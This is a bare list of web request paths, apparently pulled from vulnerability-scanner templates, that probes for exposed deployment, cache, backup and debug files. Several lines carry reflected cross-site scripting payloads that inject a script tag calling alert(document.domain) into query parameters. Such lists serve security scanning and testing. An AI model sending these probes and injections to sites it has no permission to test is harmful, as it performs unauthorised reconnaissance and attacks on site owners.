/login.php?secret=
/functions/scripts/find_full_subnets.php
/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=

/{{paths}}/
{{filepath}}{{bakext}}
/.htdeployment
/.deployment
/.php_cs.cache
{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1
{{path}}/index.php?redirect=true&meth=ajax
/debug-kit
